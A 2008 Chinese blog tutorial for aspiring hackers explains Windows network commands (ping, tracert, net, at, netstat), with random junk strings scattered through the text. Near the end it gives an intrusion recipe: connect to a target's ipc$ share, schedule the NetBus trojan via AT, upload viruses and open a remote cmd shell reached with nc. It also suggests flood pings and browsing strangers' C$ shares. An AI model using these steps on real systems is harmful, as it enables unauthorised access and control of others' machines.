经过漫长的黑夜，阳光显得格外刺眼。

黑客入门【1】

上一篇 / 下一篇 2008-06-12 18:26:49 / 个人分类：3.黑客攻防

查看( 154 ) / 评论( 7 )

要想做一名真正的黑客，仅仅依靠网络流传的黑软进行扫描或者攻击是没有用的，这样永远不可能成长为一名真正的黑客，大家需要注意的是，平时还得注意积累，这次笔者就简单的为大家介绍一些系统命令，对于初学的菜鸟绝对是必修课之一。

　　对了，再说两句废话吧，“工欲善其事，必先利其器”——当然不是让你再满世界去找新的黑客软件啦（其实我不反对使用这些软件，相反我很喜欢用它们，但是必须是在知其所以然的情况下使用，才有可能对自身的电脑水平有所帮助），要进行入侵工作的话，至少（我认为）得装上NT操作系统，以它作为入侵平台，因为NT本身对网络的支持可以说比WIN9X来得更强大得多……当然，如果想对UNIX系统动点小手术（网络中的UNIX可始终还是主流呀）而又没钱装UNIX的话，LINUX也极佳的选择（特别是现在国内至少有七八种中文LINUX版本——想当年要给REDHAT配上中文支持是何等麻烦……），至少你可以借此了解UNIX系统的基本操作以及文件存放位置、系统配置、编译器、各种动作之后的记录等等……

　　然后还得再学点编程语言，至少C与UNIX下的SHELL编程得会一点，能看懂人家写的利用各种漏洞的程序，能对它进行修改，偶尔还能写几个小程序放到网上让大伙儿乐乐，这样玩起来才可能有成就感（其实我自己还不太行，但这多少是个目标）

　　好了，废话少说，先讲讲一些M$系统里自带的相关网络程序的使用吧。

在M$的操作系统中，与网络安全较有关系的几个命令/程序是：ping\winipcfg\tracert\net\at\netstat,且待我慢慢道来:

1. ping：这是TCP/IP协议中最有用的命令之一

　　它给另一个系统发送一系列的数据包，该系统本身又发回一个响应，这条实用程序对查找远程主机很有用，它返回的结果表示是否能到达主机，宿主机发送一个返回数据包需要多长时间。

Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
[-r count] [-s count] [[-j host-list] 　 [-k host-list]]
[-w timeout] destination-list

Options:
-t Ping the specifed host until interrupted.（除非人为中止，否则一直ping下去）
-a Resolve addresses to hostnames.（把IP转为主机名）
-n count Number of echo requests to send.（响应请求的数量）
-l size Send buffer size.（封包的大小）
-f Set Don't Fragment flag in packet.（信息包中无碎片）
-i TTL Time To Live.（时间）
-v TOS Type Of Service.（服务类型）
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.（较严格的……唉，怎么译好……算了，放着吧）
-w timeout Timeout in milliseconds to wait for each reply.(timeout的时间）

　　比如大家可能都知道的一个命令 # ping -f -s 65000 ***.***.***.***或者前阶段大家所谓ping死霉国佬时所用的命令（当然这样只会造成我方自己的网络阻塞）。

　　其实这个命令主要是用来看对方应答的速度，如果怎么ping 得到的结果都是request time out。那恐怕你根本就不用你去找这台主机了，它不在你的射程之内。

论坛模式推荐收藏分享给好友推荐到圈子管理

TAG:

Nao_残发布于2008-06-12 18:27:17: 　　2. winipcfg:

　　这是用来看自己IP位址的小工具，win98自带，NT里则网络监视器里就能看到IP了，还有个小实用程序叫……好象是叫IPCONFIG吧，没怎么用，都快忘了……这种东东网上其实相当之多，但既然“自带”，又何须外求，何况网上下载的黑客的东东里有没有特洛伊犹未可知，再说了，如果你不是在自己的“爱姬”上运行，岂不是就没法干活？——哈，不好意思，跑题了，但——接着跑两句：可以把一些常用的、经典的工具上传到网上，当作一个备份，什么时候在网吧、某家公司要干活的话，直接下载就是一个完整无缺的工具包了。
这个东东相当简单，直接在DOS下键入命令就是了，没有什么参数。

　　3. tracert:是验证通往远程主机路径的实用程序

　　用法: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name

　　参数: 爱好者博墅2N.{D!aq~7L

　　-d Do not resolve addresses to hostnames.（不将IP转为主机名）
　　 -h maximum_hops Maximum number of hops to search for target.（最大跟踪数量）
　　 -j host-list Loose source route along host-list.
]4I-t+\R"R\blog.cfan.com.cn　　 -w timeout Wait timeout milliseconds for each reply.（time out 的时间）

rY0F#o%Ay F^ C　　最简单的用法就是 tracert hostname 其中hostname是计算机名或你想跟踪其路径的计算机的IP地址。TRACERT将返回数据包借以到达最终目的地的各种IP地址，你知道该怎么利用它吗？ k`kk-Y(q

　　我略为解释一下吧：跟踪通往210.142.192.130的路由，最大30:
　　第一行：*&^%&* 我就是从这里出去的（呵，真不想说^&^)
　　第四行：是不是快要出国了呢？ blog.cfan.com.cnDp#Lq4}WM
　　第九行：呀！这是日本鬼子的地盘……
)i-}#b.BI
　　4. net:这可是个非常棒的东西，如果不会用的话，赶紧睁大眼睛噢爱好者博墅}SW*G3x/oYl:a@x

初级黑客安全技术命令详解（2）
　　这个命令的语法是: 可用的命令包括： blog.cfan.com.cn9WTH1J7eC
~G

7cQMMONET ACCOUNTS NET HELP NET SHARE
NET COMPUTER NET HELPMSG NET START

a8Mck.{SNET CONFIG NET LOCALGROUP NET STATISTICS
NET CONFIG SERVER NET NAME NET STOP
NET CONFIG WORKSTATION NET PAUSE NET TIME
%X(RAR n8C爱好者博墅NET CONTINUE NET PRINT NET USE blog.cfan.com.cnua8n']H9V~1z3f&a
NET FILE NET SEND NET USER
NET GROUP NET SESSION NET VIEW 爱好者博墅~)l;z
{E)\O

NET HELP SERVICES 列出用户可以启动的网络服务。
NET HELP SYNTAX 解释如何阅读 NET HELP 语法行。 blog.cfan.com.cn;o5c!ik[K
NET HELP command 　 MORE 用于逐屏显示帮助。 blog.cfan.com.cngfg1jX1j8E0k:y

　　我可就不逐样解释了——这样会把我的手指累坏，就说说常用的两个命令吧

Nao_残发布于2008-06-12 18:27:43: a.net view

E&enIYv)kblog.cfan.com.cn#zrd)Hp)w
　　这个命令的语法是:
　　 NET VIEW [\\computername 　 /DOMAIN[:domainname]]
　　 NET VIEW /NETWORK:NW [\\computername]

/U!@n-~{\h#K爱好者博墅　　NET VIEW 用于显示一个计算机上共享资源的列表。当不带选项使用本命令时，它就会显示当前域或网络上的计算机上的列表。

　　\\computername 指用户希望浏览其共享资源的计算机。 *oc-g
vu&DU%u

　　/DOMAIN:domainname 指定用户希望浏览有效的计算机所在的域。如果省略了域名，就会显示局域网络上的所有域。

　　/NETWORK:NW 显示 NetWare 网络上所有可用的服务器。如果指定了一个计算机名，就会显示NetWare 网络中那个计算机上的可用资源。
爱好者博墅(eia-z8kZ
至于举例嘛，比如你知道一个远程计算机***.***.**.***上有开资源共享，那么运行net view \\***.***.**.*** 就可以了

　　b.net use
0DCx1dHb$V#Nblog.cfan.com.cn
"^jG(J;_I　　这个命令的语法是:NET USE [devicename 　 *] [\\computername\sharename[\volume] [password 　 *]]
[/USER:[domainname\]username]
*fu0I2o{$^M$\o7u"r[[/DELETE] 　 [/PERSISTENT:{YES 　 NO}]] blog.cfan.com.cnvR-l0A
MI:]O1h

NET USE [devicename 　 *] [password 　 *]] [/HOME]
2mq#m!TC/h爱好者博墅4rD:S7^ K3Qtf
NET USE [/PERSISTENT:{YES 　 NO}]

　　NET USE 用于将计算机与共享的资源相连接，或者切断计算机与共享资源的连接。当不带选项使用本命令时，它会列出计算机的连接。爱好者博墅!Ujs1k {6}3X(n-J

　　devicename 指定一个名字以便与资源相连接，或者指定要切断的设备。有两种类型的设备名：磁盘驱动器 (D: 至 Z:) 和打印机 (LPT1: 至 LPT3:)。输入一个星号来代替一个指定的设备名可以分配下一个可用设备名。

　　\\computername 指控制共享资源的计算机的名字。如果计算机名中包含有空字符，就要将双反斜线 (\\) 和计算机名一起用引号 (" ")括起来。计算机名可以有1 到15 个字符。
L+x?qW1oc;_{blog.cfan.com.cn*a*Ma|KB%h8D(N
　　\sharename 指共享资源的网络名字。
爱好者博墅~y@1Q!W#`]:?X
　　\volume 指定一个服务器上的 NetWare 卷。用户必须安装 Netware 的客户服务(Windows NT 工作站) 或者 Netware 的网关服务 (Windows NT 服务器) 并使之与NetWare 服务器相连。

Nao_残发布于2008-06-12 18:28:03: 　password 指访问共享资源所需要的密码。
+J2^/d2T+m-Nblog.cfan.com.cn爱好者博墅t&G#|0e/z$Q1g6dp
　　* 进行密码提示。当在密码提示符下输入密码时，密码是不会显示的。爱好者博墅 p(HF$U/RoU
blog.cfan.com.cnI9I;}'{8`SL
　　/USER 指定连接时的一个不同的用户名。
3} l}*W9T4|9Wb-Q爱好者博墅
:c5QYz7r6R4wblog.cfan.com.cn　　domainname 指定另外一个域。如果缺省域，就会使用当前登录的域。 blog.cfan.com.cnXG'^l0R7H/w

:Z/ZTV%_iH　　username 指定登录的用户名。
[#k&IzB"NWblog.cfan.com.cn爱好者博墅fo2ma{&c^n
　　/HOME 将用户与他们的宿主目录相连。

　　/DELETE 取消一个网络连接，并且从永久连接列表中删除该连接。

#O$X7j,nOA9Deblog.cfan.com.cn　　/PERSISTENT 控制对永久网络连接的使用。其缺省值是最近使用的设置。
7v
m&rjf+W)iSblog.cfan.com.cn
　　YES 在连接产生时保存它们，并在下次登录时恢复它们。
;xu2vj6\0PY%]-K8Tb&ccd
　　NO 不保存正在产生的连接或后续的连接；现有的连接将在下次登录时被恢复。可以使用 /DELETE 选项开关来删除永久连接。 3EY6V
xv&c_+L8am

3rI;^w%`w　PS:前两天在绿色兵团的贴子里见到一位仁兄的话，与这个命令有异曲共工之妙，也说明一个大概：

　　在浏览器中输入 file:///\\***.***.**.***\c$ $`6sZE2q(H

　　则网上共享的C盘内容就会显示出来了，就仿佛用浏览器上FTP站点看到的一样。各位不妨试试，还可试试举一反三……
N J*i_#n2VR
　　5.at：排定在特定的日期和时间运行某些命令和程序。
sA9w(lLhGttblog.cfan.com.cn
　　运行 AT 命令之前必须先启动 Schedule 服务。瞧，现炒就得现卖，刚学了net命令，但这个start命令我可没详述，自已看看帮助文件，摸索一下各种命令的用法吧。
XZW `.Lv
　　C:\>net start schedule
　　 Schedule 正在启动服务.....
Ol7t-i4G爱好者博墅　　 Schedulw 服务启动成功。
blog.cfan.com.cnTL"BQyn NS
　　AT [\\computername] [ [id] [/DELETE] 　 /DELETE [/YES]]
　　 AT [\\computername] time [/INTERACTIVE]
　　 [ /EVERY:date[,...] 　 /NEXT:date[,...]] "command"

　　\\computername 指定远程计算机。如果省略这个参数命令会被排定在本机上运行。

　　id 指定给排定进度命令的识别号。
m
\rOW|d7d:y6x3}blog.cfan.com.cn
'u_J*b.P$U'W(C
|
kblog.cfan.com.cn　　/delete 删除某个已排定进度的命令。如果省略标识，计算机上所有已排定进度的命令都会被删除。

Nao_残发布于2008-06-12 18:28:25: /yes 用于删除所有作业，且不想在运行删除时显示确认信息。

　　time 指定命令运行的时间。
　　 interactive 允许作业在运行时，与用户通过桌面交互。

!Cq`;\3lRk9r-hblog.cfan.com.cn　　/every:date[,...] 指定在每周或每月的某日 (或某几日) 运行命令。
　　如果省略日期，则默认为在每月的本日运行。
blog.cfan.com.cn2Fo wZ]5O,~W
　　/next:date[,...] 指定在下一个指定日期 (如，下周三)，运行命令。
　　如果省略日期，则默认为在每月的本日运行。

　　"command" 准备运行的 Windows NT 命令或批处理文件。

y!KG/ra(Z8TPom6s　　知道了如何使用AT，再来看看如何在远程NT上运行ntsrv.exe：

　　1 利用管理员登陆到目的服务器，方法为： net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"
　　 2 利用ntsrv.exe启动远程: netsvc \\x.x.x.x schedule /start
　　 3 利用AT.EXE在远程服务器设置程序定时运行，当然最快运行最理想，所以，你可以用letmein.exe得到服务器的时间，然后： blog.cfan.com.cn\Y[6]6lmu
blog.cfan.com.cnK3D}
sVr,m
　　at \\x.x.x.x 00:00 ntsrv.exe /port:64321 blog.cfan.com.cn5aGB"t
G
blog.cfan.com.cn
a;a!Afv&xH{
Y
　　其中00:00要改为用letmein.exe得回来的具体时间+一点容量，等一会后，再在本地启动netbus.exe，键入目的服务器得ip地址或hostname，连接！比如第一种方法，你想要在目的服务器运行诸如病毒之类的东东，可以利用netbus得上传功能，将各种“大补丸”上传至目的服务器，再用netbus的"Start program"，键入完整路径，就ok了！第二种方法是利用netbus的“App redirect”功能，启动远程telnet服务，如下：在netbus中击“App redirect”，键入"C:\>winnt\system32\cmd.exe"，Port为：4321，服务就启动了，然后在本地运行：nc x.x.x.x 4321，出现dos启动的画面就表示连接成功： blog.cfan.com.cn8j
I5^#d,`-OB

.|kQ^G*Sa,\blog.cfan.com.cnMicrosoft(R) Windows NT(TM) 爱好者博墅K1_;jUk:Bot
(C) Copyright 1985-1996 Microsoft Corp.
"TA8Y^|5X'd,n'Oxblog.cfan.com.cnC:\>

注：这里有一小段是抄KILLUSA的文章——别找我要稿费啊^&^

Nao_残发布于2008-06-12 18:28:52: 　4.netstat 这是一个观察网络连接状态的实用工具。
y9Q(SHW%gNM%^爱好者博墅%?H0M"H-[[U
　　它能检验IP的当前连接状态，在断定你的基本级通信正在进行后，就要验证系统上的服务。这个服务包括检查正在收听输入的通信量和/或验证你正在创建一个与远程站点的会话，它可以很轻松地做到这一点。网上也可以看到很多如X-netstat之类的工具，是WIN界面的，更加直观而已，并没有多什么功能，这个命令的具体用法如下：

Displays protocol statistics and current TCP/IP network connections.（显示协议与当前网络连接） blog.cfan.com.cn+e,q(@
QZ

NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval] blog.cfan.com.cn|||+N7q;n^*uG

b$ZTOI
oT-a Displays all connections and listening ports.（显示所有连接和监听端口）
-e Displays Ethernet statistics. This may be combined with the -s
option.（显示以太连接，可以与-s连用）
.Y@-P(e1OEP-n Displays addresses and port numbers in numerical form.（显示地址和端口）
$W{:g#}A%sk爱好者博墅-p proto Shows connections for the protocol specified by proto; proto
may be TCP or UDP. If used with the -s option to display
per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are blog.cfan.com.cn:e*V&V@$eJ
o%b'|X`
shown for TCP, UDP and IP; the -p option may be used to specify
a subset of the default.
/} w:f
[Einterval Redisplays selected statistics, pausing interval seconds
between each display. Press CTRL+C to stop redisplaying
statistics. If omitted, netstat will print the current
configuration information once.（interval是设定一个刷新时间，在间隔时间内暂停，按CTRL+C停止……）
U
va0`3Qk"dmy爱好者博墅s4OUXN&?s)lK4\
　　这是我在本机未连接网络时运行的，第一列为协议，第二列为本地地址，第三列是与你进行连接的主机或用户的IP位址（IP后冒号之后的数字是端口号），最后一列是状态。这个命令以-n和-a的参数我较常使用，读者可以参考使用。